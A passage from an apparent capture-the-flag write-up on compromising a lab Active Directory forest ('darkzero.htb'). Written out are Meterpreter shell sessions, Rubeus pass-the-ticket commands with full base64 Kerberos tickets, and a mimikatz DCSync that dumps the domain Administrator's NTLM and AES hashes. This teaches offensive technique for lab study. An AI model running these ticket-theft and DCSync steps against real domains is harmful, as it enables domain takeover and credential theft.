f3IkcklB0rlyLMn9WdjIL2PhJH28/LwmcDDWQicKSp+0AJqL7LOJMT2zrJUEQ18g5Esh248kM2t469wGDA7UoRWdROJl+l31I5JEezxEoOWVQrqzlUJEePyheRoI5ta128sgYeVqbfVhYojgOgP9aJc0XgHXc6Q9YxvO+8sKqRnPQM1Nu5o1sNivB7vSYMwNk3xBIkzgcQHQuivOSou4fhPZpv/ncGUDjRdvJpctNDNTMqhQoVCHqlb/Jr6bSebJwz88VF2fZDwTziz9YP13CRcFwb/ZH/rOKEiK8EJ9dTChEqDFeWZos0QffRUdmOpDPCQWLt/yPHCccVg1VlpL6gBZBEi9FMcpuFhiGzjivykPhADDJjO/F/eoOsC5cEWcW0yf9fSo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg+jdktWSWR/d4MMioGgZigZAgoExtvibbf7tLau8mX4ehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUxMTIyNDhaphEYDzIwMjUxMDA1MjEyMjQ4WqcRGA8yMDI1MTAxMjExMjI0OFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
[*] Ticket cache size: 1
- Next I
importedtheticketonDC02usingRubeusagain. - At this point it was a bit of switching sessions back and forth within
Metasploit.
^Z
Background channel 2? [y/N] y
meterpreter >
meterpreter > shell
Process 676 created.
Channel 3 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>echo "doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDYPPzgInQu2joilihgD51S/tHe9LnYS/EqXm5T1cl82tmQx7MgKt03n8Lf7b4RE3lTxRinPevS9AHAD78RmgMr6R4/b+jxUZLrK7x+WrAHg70iX7q6/9EBj3wUE5ISrkhnhHUmM2e8Xd6dug+3RhbiC0McqfsHhHA3n/enCq+vCkhSkcv7NZF3TGHbU/wIK0rFpwacqxIUbgvWkwVuG+ds0aQG3/5WQXnNpOZ9KUOl3xC+8MhLlXkJokCa4VvKSFVVe96uFHLsSiTzKffWz5OIysaUJq5rRc4+fb/QVpSlyGuoi2MJnDocvtFPRtH/6B/01lv2VnKDUh3rebkMwl/bZi+NUuHSr8b97UpWqLAIiO7W3UWaqG531rBAJ37LxrRWC0xjK7egOSZbmq+Wn2gyKd1Xl+/XNPUR9KK83L6dW+IOLSYcAmZmv1VbanvnRs1WDsNic2Il6sGluHye2ws/JXMNgHSA8IRpGlRU9zxS3E+/hmz7itLjk0nQURlJzjoQearRpEIUv0V4Md8p5GRnqg6hbmkbd22UKKVtHOEU1bwEGJeAZfSHrqx6em5hgLp0wr/Bl7pMIuBEbXPHFjb0a0JNWmBo51HWXer0Jju5ZWwK+RzadXiOkv+n+SlMoDvvFOqfb9ARJ+HiIgalndcR9FjeciBPa96tz+5wbEsUhFY7hfdkMkufN1zcxA1nQGYUAdrVcU9J97lLGs1qG5Tk9SKlYrTT3eupNc7+PzVNOXG211ht9TNigrNGX+2gz5nvLJbOqTB3QHbWvAFufV2fIo8BZIh44iaDUKyX5uMJVOPpU5E6jKmZpMrPCX/Y6uhZSg6DltuFNh3SnUM9e3zGRS6irqMdynYQHu3916o3t2ZB5Xp8PuhvnaO43Q9zeCEwmFVSJ4XvtezFBUXHjBtGBD05WqnqwBeZ5ZmRVwRNdrrWChqbR8A0yssIUeOzn2lqMWwYPF0/VLvP7Z3869T7mq6T2gwKhv5rKASSYW0oCPaP2YqoJoZdNi/T9QF8OXodzKnJ+e22cPuzb3/3YNiYrhf3IkcklB0rlyLMn9WdjIL2PhJH28/LwmcDDWQicKSp+0AJqL7LOJMT2zrJUEQ18g5Esh248kM2t469wGDA7UoRWdROJl+l31I5JEezxEoOWVQrqzlUJEePyheRoI5ta128sgYeVqbfVhYojgOgP9aJc0XgHXc6Q9YxvO+8sKqRnPQM1Nu5o1sNivB7vSYMwNk3xBIkzgcQHQuivOSou4fhPZpv/ncGUDjRdvJpctNDNTMqhQoVCHqlb/Jr6bSebJwz88VF2fZDwTziz9YP13CRcFwb/ZH/rOKEiK8EJ9dTChEqDFeWZos0QffRUdmOpDPCQWLt/yPHCccVg1VlpL6gBZBEi9FMcpuFhiGzjivykPhADDJjO/F/eoOsC5cEWcW0yf9fSo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg+jdktWSWR/d4MMioGgZigZAgoExtvibbf7tLau8mX4ehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUxMTIyNDhaphEYDzIwMjUxMDA1MjEyMjQ4WqcRGA8yMDI1MTAxMjExMjI0OFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=" > C:\temp\dc01.b64
echo "doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDYPPzgInQu2joilihgD51S/tHe9LnYS/EqXm5T1cl82tmQx7MgKt03n8Lf7b4RE3lTxRinPevS9AHAD78RmgMr6R4/b+jxUZLrK7x+WrAHg70iX7q6/9EBj3wUE5ISrkhnhHUmM2e8Xd6dug+3RhbiC0McqfsHhHA3n/enCq+vCkhSkcv7NZF3TGHbU/wIK0rFpwacqxIUbgvWkwVuG+ds0aQG3/5WQXnNpOZ9KUOl3xC+8MhLlXkJokCa4VvKSFVVe96uFHLsSiTzKffWz5OIysaUJq5rRc4+fb/QVpSlyGuoi2MJnDocvtFPRtH/6B/01lv2VnKDUh3rebkMwl/bZi+NUuHSr8b97UpWqLAIiO7W3UWaqG531rBAJ37LxrRWC0xjK7egOSZbmq+Wn2gyKd1Xl+/XNPUR9KK83L6dW+IOLSYcAmZmv1VbanvnRs1WDsNic2Il6sGluHye2ws/JXMNgHSA8IRpGlRU9zxS3E+/hmz7itLjk0nQURlJzjoQearRpEIUv0V4Md8p5GRnqg6hbmkbd22UKKVtHOEU1bwEGJeAZfSHrqx6em5hgLp0wr/Bl7pMIuBEbXPHFjb0a0JNWmBo51HWXer0Jju5ZWwK+RzadXiOkv+n+SlMoDvvFOqfb9ARJ+HiIgalndcR9FjeciBPa96tz+5wbEsUhFY7hfdkMkufN1zcxA1nQGYUAdrVcU9J97lLGs1qG5Tk9SKlYrTT3eupNc7+PzVNOXG211ht9TNigrNGX+2gz5nvLJbOqTB3QHbWvAFufV2fIo8BZIh44iaDUKyX5uMJVOPpU5E6jKmZpMrPCX/Y6uhZSg6DltuFNh3SnUM9e3zGRS6irqMdynYQHu3916o3t2ZB5Xp8PuhvnaO43Q9zeCEwmFVSJ4XvtezFBUXHjBtGBD05WqnqwBeZ5ZmRVwRNdrrWChqbR8A0yssIUeOzn2lqMWwYPF0/VLvP7Z3869T7mq6T2gwKhv5rKASSYW0oCPaP2YqoJoZdNi/T9QF8OXodzKnJ+e22cPuzb3/3YNiYrhf3IkcklB0rlyLMn9WdjIL2PhJH28/LwmcDDWQicKSp+0AJqL7LOJMT2zrJUEQ18g5Esh248kM2t469wGDA7UoRWdROJl+l31I5JEezxEoOWVQrqzlUJEePyheRoI5ta128sgYeVqbfVhYojgOgP9aJc0XgHXc6Q9YxvO+8sKqRnPQM1Nu5o1sNivB7vSYMwNk3xBIkzgcQHQuivOSou4fhPZpv/ncGUDjRdvJpctNDNTMqhQoVCHqlb/Jr6bSebJwz88VF2fZDwTziz9YP13CRcFwb/ZH/rOKEiK8EJ9dTChEqDFeWZos0QffRUdmOpDPCQWLt/yPHCccVg1VlpL6gBZBEi9FMcpuFhiGzjivykPhADDJjO/F/eoOsC5cEWcW0yf9fSo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg+jdktWSWR/d4MMioGgZigZAgoExtvibbf7tLau8mX4ehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUxMTIyNDhaphEYDzIwMjUxMDA1MjEyMjQ4WqcRGA8yMDI1MTAxMjExMjI0OFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=" > C:\temp\dc01.b64
C:\temp>Rubeus.exe ptt /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDYPPzgInQu2joilihgD51S/tHe9LnYS/EqXm5T1cl82tmQx7MgKt03n8Lf7b4RE3lTxRinPevS9AHAD78RmgMr6R4/b+jxUZLrK7x+WrAHg70iX7q6/9EBj3wUE5ISrkhnhHUmM2e8Xd6dug+3RhbiC0McqfsHhHA3n/enCq+vCkhSkcv7NZF3TGHbU/wIK0rFpwacqxIUbgvWkwVuG+ds0aQG3/5WQXnNpOZ9KUOl3xC+8MhLlXkJokCa4VvKSFVVe96uFHLsSiTzKffWz5OIysaUJq5rRc4+fb/QVpSlyGuoi2MJnDocvtFPRtH/6B/01lv2VnKDUh3rebkMwl/bZi+NUuHSr8b97UpWqLAIiO7W3UWaqG531rBAJ37LxrRWC0xjK7egOSZbmq+Wn2gyKd1Xl+/XNPUR9KK83L6dW+IOLSYcAmZmv1VbanvnRs1WDsNic2Il6sGluHye2ws/JXMNgHSA8IRpGlRU9zxS3E+/hmz7itLjk0nQURlJzjoQearRpEIUv0V4Md8p5GRnqg6hbmkbd22UKKVtHOEU1bwEGJeAZfSHrqx6em5hgLp0wr/Bl7pMIuBEbXPHFjb0a0JNWmBo51HWXer0Jju5ZWwK+RzadXiOkv+n+SlMoDvvFOqfb9ARJ+HiIgalndcR9FjeciBPa96tz+5wbEsUhFY7hfdkMkufN1zcxA1nQGYUAdrVcU9J97lLGs1qG5Tk9SKlYrTT3eupNc7+PzVNOXG211ht9TNigrNGX+2gz5nvLJbOqTB3QHbWvAFufV2fIo8BZIh44iaDUKyX5uMJVOPpU5E6jKmZpMrPCX/Y6uhZSg6DltuFNh3SnUM9e3zGRS6irqMdynYQHu3916o3t2ZB5Xp8PuhvnaO43Q9zeCEwmFVSJ4XvtezFBUXHjBtGBD05WqnqwBeZ5ZmRVwRNdrrWChqbR8A0yssIUeOzn2lqMWwYPF0/VLvP7Z3869T7mq6T2gwKhv5rKASSYW0oCPaP2YqoJoZdNi/T9QF8OXodzKnJ+e22cPuzb3/3YNiYrhf3IkcklB0rlyLMn9WdjIL2PhJH28/LwmcDDWQicKSp+0AJqL7LOJMT2zrJUEQ18g5Esh248kM2t469wGDA7UoRWdROJl+l31I5JEezxEoOWVQrqzlUJEePyheRoI5ta128sgYeVqbfVhYojgOgP9aJc0XgHXc6Q9YxvO+8sKqRnPQM1Nu5o1sNivB7vSYMwNk3xBIkzgcQHQuivOSou4fhPZpv/ncGUDjRdvJpctNDNTMqhQoVCHqlb/Jr6bSebJwz88VF2fZDwTziz9YP13CRcFwb/ZH/rOKEiK8EJ9dTChEqDFeWZos0QffRUdmOpDPCQWLt/yPHCccVg1VlpL6gBZBEi9FMcpuFhiGzjivykPhADDJjO/F/eoOsC5cEWcW0yf9fSo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg+jdktWSWR/d4MMioGgZigZAgoExtvibbf7tLau8mX4ehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUxMTIyNDhaphEYDzIwMjUxMDA1MjEyMjQ4WqcRGA8yMDI1MTAxMjExMjI0OFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
Rubeus.exe ptt /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDYPPzgInQu2joilihgD51S/tHe9LnYS/EqXm5T1cl82tmQx7MgKt03n8Lf7b4RE3lTxRinPevS9AHAD78RmgMr6R4/b+jxUZLrK7x+WrAHg70iX7q6/9EBj3wUE5ISrkhnhHUmM2e8Xd6dug+3RhbiC0McqfsHhHA3n/enCq+vCkhSkcv7NZF3TGHbU/wIK0rFpwacqxIUbgvWkwVuG+ds0aQG3/5WQXnNpOZ9KUOl3xC+8MhLlXkJokCa4VvKSFVVe96uFHLsSiTzKffWz5OIysaUJq5rRc4+fb/QVpSlyGuoi2MJnDocvtFPRtH/6B/01lv2VnKDUh3rebkMwl/bZi+NUuHSr8b97UpWqLAIiO7W3UWaqG531rBAJ37LxrRWC0xjK7egOSZbmq+Wn2gyKd1Xl+/XNPUR9KK83L6dW+IOLSYcAmZmv1VbanvnRs1WDsNic2Il6sGluHye2ws/JXMNgHSA8IRpGlRU9zxS3E+/hmz7itLjk0nQURlJzjoQearRpEIUv0V4Md8p5GRnqg6hbmkbd22UKKVtHOEU1bwEGJeAZfSHrqx6em5hgLp0wr/Bl7pMIuBEbXPHFjb0a0JNWmBo51HWXer0Jju5ZWwK+RzadXiOkv+n+SlMoDvvFOqfb9ARJ+HiIgalndcR9FjeciBPa96tz+5wbEsUhFY7hfdkMkufN1zcxA1nQGYUAdrVcU9J97lLGs1qG5Tk9SKlYrTT3eupNc7+PzVNOXG211ht9TNigrNGX+2gz5nvLJbOqTB3QHbWvAFufV2fIo8BZIh44iaDUKyX5uMJVOPpU5E6jKmZpMrPCX/Y6uhZSg6DltuFNh3SnUM9e3zGRS6irqMdynYQHu3916o3t2ZB5Xp8PuhvnaO43Q9zeCEwmFVSJ4XvtezFBUXHjBtGBD05WqnqwBeZ5ZmRVwRNdrrWChqbR8A0yssIUeOzn2lqMWwYPF0/VLvP7Z3869T7mq6T2gwKhv5rKASSYW0oCPaP2YqoJoZdNi/T9QF8OXodzKnJ+e22cPuzb3/3YNiYrhf3IkcklB0rlyLMn9WdjIL2PhJH28/LwmcDDWQicKSp+0AJqL7LOJMT2zrJUEQ18g5Esh248kM2t469wGDA7UoRWdROJl+l31I5JEezxEoOWVQrqzlUJEePyheRoI5ta128sgYeVqbfVhYojgOgP9aJc0XgHXc6Q9YxvO+8sKqRnPQM1Nu5o1sNivB7vSYMwNk3xBIkzgcQHQuivOSou4fhPZpv/ncGUDjRdvJpctNDNTMqhQoVCHqlb/Jr6bSebJwz88VF2fZDwTziz9YP13CRcFwb/ZH/rOKEiK8EJ9dTChEqDFeWZos0QffRUdmOpDPCQWLt/yPHCccVg1VlpL6gBZBEi9FMcpuFhiGzjivykPhADDJjO/F/eoOsC5cEWcW0yf9fSo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg+jdktWSWR/d4MMioGgZigZAgoExtvibbf7tLau8mX4ehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUxMTIyNDhaphEYDzIwMjUxMDA1MjEyMjQ4WqcRGA8yMDI1MTAxMjExMjI0OFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Import Ticket
[+] Ticket successfully imported!
- A quick verification showed that everything worked according to plan
C:\temp>Rubeus.exe klist
Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
Action: List Kerberos Tickets (All Users)
[*] Current LUID : 0x3e7
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x57b01
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:17:07 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:17:07 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : GC/DC02.darkzero.ext/darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : Administrator
Domain : darkzero-ext
LogonId : 0x364ea
UserSID : S-1-5-21-1969715525-31638512-2552845157-500
AuthenticationPackage : Kerberos
LogonType : Batch
LogonTime : 10/4/2025 7:05:20 PM
LogonServer : DC02
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName : Administrator@darkzero.ext
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:05:20 PM ; 10/5/2025 5:05:20 AM ; 10/11/2025 7:05:20 PM
Server Name : krbtgt/DARKZERO.EXT @ DARKZERO.EXT
Client Name : Administrator @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
UserName : svc_sql
Domain : darkzero-ext
LogonId : 0x29849
UserSID : S-1-5-21-1969715525-31638512-2552845157-1103
AuthenticationPackage : Kerberos
LogonType : Service
LogonTime : 10/4/2025 7:04:16 PM
LogonServer : DC02
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName : svc_sql@darkzero.ext
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:07:53 PM ; 10/5/2025 6:06:37 AM ; 10/11/2025 8:06:37 PM
Server Name : krbtgt/DARKZERO.HTB @ DARKZERO.EXT
Client Name : svc_sql @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, renewable, forwardable (40a10000)
[1] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:07:53 PM ; 10/5/2025 6:06:37 AM ; 10/11/2025 8:06:37 PM
Server Name : ldap/dc01.darkzero.htb @ DARKZERO.HTB
Client Name : svc_sql @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
[2] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:06:37 PM ; 10/5/2025 6:06:37 AM ; 10/11/2025 8:06:37 PM
Server Name : cifs/dc01.darkzero.htb @ DARKZERO.HTB
Client Name : svc_sql @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x2314c
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : ldap/DC02.darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x3e4
UserSID : S-1-5-20
AuthenticationPackage : Negotiate
LogonType : Service
LogonTime : 10/4/2025 7:01:53 PM
LogonServer :
LogonServerDNSDomain :
UserPrincipalName : DC02$@darkzero.ex
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:02:05 PM ; 10/5/2025 6:02:05 AM ; 10/11/2025 8:02:05 PM
Server Name : krbtgt/DARKZERO.EXT @ DARKZERO.EXT
Client Name : dc02$ @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
[1] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:02:05 PM ; 10/5/2025 6:02:05 AM ; 10/11/2025 8:02:05 PM
Server Name : DNS/dc02.darkzero.ext @ DARKZERO.EXT
Client Name : dc02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : Administrator
Domain : darkzero-ext
LogonId : 0x70db7b
UserSID : S-1-5-21-1969715525-31638512-2552845157-500
AuthenticationPackage : Kerberos
LogonType : Batch
LogonTime : 10/5/2025 4:05:20 AM
LogonServer : DC02
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName : Administrator@darkzero.ext
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/5/2025 4:05:20 AM ; 10/5/2025 2:05:20 PM ; 10/12/2025 4:05:20 AM
Server Name : krbtgt/DARKZERO.EXT @ DARKZERO.EXT
Client Name : Administrator @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x28ac2
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:03:38 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:03:38 PM ; 10/5/2025 5:02:37 AM ; 10/11/2025 7:02:37 PM
Server Name : krbtgt/DARKZERO.EXT @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x2763e
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:46 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : LDAP/DC02.darkzero.ext/darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x22cbc
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : LDAP/DC02.darkzero.ext/darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x22b29
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : ldap/DC02.darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x226d8
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : ldap/DC02.darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x223bf
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : ldap/DC02.darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x3e7
UserSID : S-1-5-18
AuthenticationPackage : Negotiate
LogonType : 0
LogonTime : 10/4/2025 7:01:50 PM
LogonServer :
LogonServerDNSDomain : darkzero.ext
UserPrincipalName : DC02$@darkzero.ext
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/5/2025 4:22:48 AM ; 10/5/2025 2:22:48 PM ; 10/12/2025 4:22:48 AM
Server Name : krbtgt/DARKZERO.HTB @ DARKZERO.HTB
Client Name : DC01$ @ DARKZERO.HTB
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
- And there it was, the
client nameofDC01$.
<--- CUT FOR BREVITY --->
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x3e7
...
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/5/2025 4:22:48 AM ; 10/5/2025 2:22:48 PM ; 10/12/2025 4:22:48 AM
Server Name : krbtgt/DARKZERO.HTB @ DARKZERO.HTB
Client Name : DC01$ @ DARKZERO.HTB
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
<--- CUT FOR BREVITY --->
DCSync Attack
- And as last step, I loaded
mimikatzonce more but this time performed theDCSyncfrom withinDC02. - and grabbed the
hashforAdministratoronDC01to gain access viaEvil-WinRMlater.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd "lsadump::dcsync /domain:darkzero.htb /user:Administrator"
[DC] 'darkzero.htb' will be the domain
[DC] 'DC01.darkzero.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/10/2025 9:42:44 AM
Object Security ID : S-1-5-21-1152179935-589108180-1989892463-500
Object Relative ID : 500
Credentials:
Hash NTLM: 5917507bdf2ef2c2b0a869a1cba40726
ntlm- 0: 5917507bdf2ef2c2b0a869a1cba40726
ntlm- 1: 5917507bdf2ef2c2b0a869a1cba40726
lm - 0: 58ef66870a9927dd48b3bd9d7e03845f
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : eb8f12be2ec1b48c9b9ed472823e4e60
* Primary:Kerberos-Newer-Keys *
Default Salt : DARKZERO.HTBAdministrator
Default Iterations : 4096
Credentials
des_cbc_md5_nt (4096) : 2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
unknow (4096) : a23315d970fe9d556be03ab611730673
aes256_hmac (4096) : d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
aes128_hmac (4096) : b1e04b87abab7be2c600fc652ac84362
rc4_hmac_nt (4096) : 5917507bdf2ef2c2b0a869a1cba40726
ServiceCredentials
des_cbc_md5_nt (4096) : 2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
unknow (4096) : a23315d970fe9d556be03ab611730673
aes256_hmac (4096) : d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
aes128_hmac (4096) : b1e04b87abab7be2c600fc652ac84362
OldCredentials
des_cbc_md5_nt (4096) : 298bc77657a3737b452bb09be407d46b795774e5c3bbfcc68e8f0a4015b59459
unknow (4096) : d1d84cca796daa8d9dda56c9fbd29110
aes256_hmac (4096) : fe0ba028010ee4f408ebc846d3f480c1880a4f0274acdb226d3afcdc3595dc21
aes128_hmac (4096) : a2a7e0e9a4b5ade57242b3e97756dca3
